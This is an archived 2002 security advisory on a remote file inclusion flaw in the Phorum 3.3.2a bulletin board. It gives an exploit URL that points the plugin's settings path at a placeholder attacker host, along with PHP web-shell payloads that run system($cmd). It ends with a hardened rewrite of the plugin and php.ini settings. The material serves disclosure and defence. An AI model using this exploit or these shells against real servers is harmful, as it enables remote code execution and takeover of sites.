OSEC

From: Markus Arndt (markus-arndtweb.de)
Date: Fri May 17 2002 - 13:26:40 CDT


    Target:
    Phorum 3.3.2a (prior versions?)

    Description:
    In Phorum 3.3.2a (a bulletin board) there's a security flaw that lets remote users
    include external php scripts and execute arbitrary code.

    Found by:
    Markus Arndt<markus-arndtweb.de>

    Vendor:
    http://www.phorum.org

    Notified Vendor:
    Yes, already fixed version available

    Details:

    After extracting the Phorum 3.3.2a archive we have lots of php files and subfolders.
    I just snooped around a bit and found this file vulnerable to remote script inclusion:

    ./plugin/replace/plugin.php

    let's see some code:

            <?php
            include("$PHORUM[settings_dir]/replace.php");

            function mod_replace_read_body ($body) {
              global $pluginreplace;
              reset($pluginreplace);
              while(list($key,$val) = each($pluginreplace)) {
                $body = str_replace($key,$val,$body);
              }
              return $body;
            }

            $plugins["read_body"]["mod_replace"]="mod_replace_read_body";

            ?>

    Easy one..

    http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls

    This one will get the file http://[evilhost]/replace.php and execute it.
    If [evilhost] has php enabled we could use this one as replace.php:

            <?
            echo("<?
            system(\"\$cmd\");
            ?>");
            ?>

    If it's not php-enabled simply:
            <?
            system("$cmd");
            ?>

    Markus Arndt<markus-arndtweb.de>
    http://skka.de
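The flaw above is a classic register_globals remote file inclusion: the plugin trusts $PHORUM[settings_dir] even though, when plugin.php is requested directly, that array comes straight from the query string, and include() in PHP of that era happily fetched a URL. The following is an added example, not Phorum's own code or the vendor's fix: a hardened rewrite of plugin/replace/plugin.php that refuses to run unless loaded by the main application and only includes replace.php from a real local directory under the install root. The PHORUM_LOADED constant and the install root layout are assumptions for illustration.

```php
<?php
// Added example, not Phorum's code. Hardened plugin/replace/plugin.php.
// Assumption (hypothetical): the main Phorum scripts define PHORUM_LOADED
// before including any plugin, and $PHORUM['settings_dir'] is then set from
// the local configuration rather than from the request.

// 1. Refuse direct requests. With register_globals on, a direct hit on this
//    file lets the client supply $PHORUM[settings_dir] itself.
if (!defined('PHORUM_LOADED')) {
    header('HTTP/1.0 403 Forbidden');
    exit('plugin must be loaded by Phorum, not requested directly');
}

// 2. Resolve the settings directory to a real local path and require it to
//    sit under the installation root. realpath() returns false for
//    "http://evilhost" or any other URL, and the prefix check rejects
//    ../ traversal out of the install tree.
function phorum_local_settings_file($phorum, $install_root)
{
    $dir  = isset($phorum['settings_dir']) ? realpath($phorum['settings_dir']) : false;
    $root = realpath($install_root);
    if ($dir === false || $root === false
        || strncmp($dir, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        throw new RuntimeException('settings_dir is not a local directory under the install root');
    }
    $file = $dir . DIRECTORY_SEPARATOR . 'replace.php';
    if (!is_file($file)) {
        throw new RuntimeException('replace.php is missing from the settings directory');
    }
    return $file;
}

// Initialise the variable replace.php is expected to fill so that a missing
// or empty file cannot leave it under register_globals control either.
$pluginreplace = array();
include phorum_local_settings_file($PHORUM, __DIR__ . '/../..');

// Same behaviour as the original plugin: apply every configured replacement
// to the message body before it is displayed.
function mod_replace_read_body($body)
{
    global $pluginreplace;
    foreach ($pluginreplace as $key => $val) {
        $body = str_replace($key, $val, $body);
    }
    return $body;
}

$plugins['read_body']['mod_replace'] = 'mod_replace_read_body';
```

Two php.ini settings close the same door from the other side and are worth checking on any host running code of this age: register_globals = Off stops request parameters from materialising as variables such as $PHORUM in the first place, and allow_url_fopen = Off (allow_url_include = Off on PHP 5.2 and later) stops include() from fetching http:// or ftp:// paths at all. Neither replaces the guard in the plugin, since a local file-inclusion path or a poisoned upload would still get through without it.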